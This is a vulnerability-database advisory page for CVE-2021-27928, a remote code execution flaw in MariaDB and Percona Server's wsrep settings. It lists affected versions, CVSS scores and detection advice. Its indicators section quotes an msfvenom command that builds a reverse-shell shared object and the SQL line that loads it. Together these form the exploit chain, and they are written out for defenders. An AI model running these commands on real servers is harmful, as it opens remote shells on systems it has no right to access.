cbcvebase.
CVE-2021-27928
published 2021-03-19

CVE-2021-27928: A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server…

PriorityP265high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
38.18%
98.4th percentile
A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.

Affected

20 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
debianmariadb-10.5< mariadb-10.5 1:10.5.9-1 (bullseye)mariadb-10.5 1:10.5.9-1 (bullseye)
galeraclusterwsrep<= 2021-03-03
mariadbmariadb>= 10.2 < 10.2.3710.2.37
mariadbmariadb>= 10.3 < 10.3.2810.3.28
mariadbmariadb>= 10.4 < 10.4.1810.4.18
mariadbmariadb>= 10.5 < 10.5.910.5.9
msrcmariadb-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
msrcmariadb-debuginfo-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-debuginfo-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
msrcmariadb-devel-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-devel-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
msrcmariadb-errmsg-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-errmsg-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
msrcmariadb-server-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-server-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
msrcmariadb-server-galera-10.3.28-1.cm1.aarch64.rpm_on_cbl_mariner_1.0_arm
msrcmariadb-server-galera-10.3.28-1.cm1.x86_64.rpm_on_cbl_mariner_1.0_x64
perconapercona_server<= 2021-03-03

Detection & IOCsextracted from sources · hover to see the quote

filenameCVE-2021-27928.so
path/tmp/CVE-2021-27928.so
commandSET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
commandmsfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so
  • Monitor MariaDB/MySQL for SET GLOBAL wsrep_provider being set to a filesystem path (especially /tmp/) pointing to a .so shared library file — this is the core exploit primitive for CVE-2021-27928.
  • Alert on MariaDB/MySQL process spawning unexpected child processes or outbound network connections, as exploitation loads a malicious ELF shared object via wsrep_provider causing RCE in the DB server process context.
  • Detect ELF shared objects (format elf-so) dropped into world-writable directories such as /tmp and subsequently loaded by the MariaDB/MySQL process.
  • Audit use of the SUPER privilege in MariaDB/MySQL; exploitation requires a SUPER-privileged account to modify wsrep_provider and wsrep_notify_cmd global variables.
  • ·The exploit requires the attacker to have a database account with SUPER privileges; without SUPER, the SET GLOBAL wsrep_provider command cannot be executed.
  • ·Both wsrep_provider and wsrep_notify_cmd are the two modifiable system variables that enable the exploit path; environments where Galera/wsrep is not configured may still be vulnerable if the variables are writable.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
vendor_msrc7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.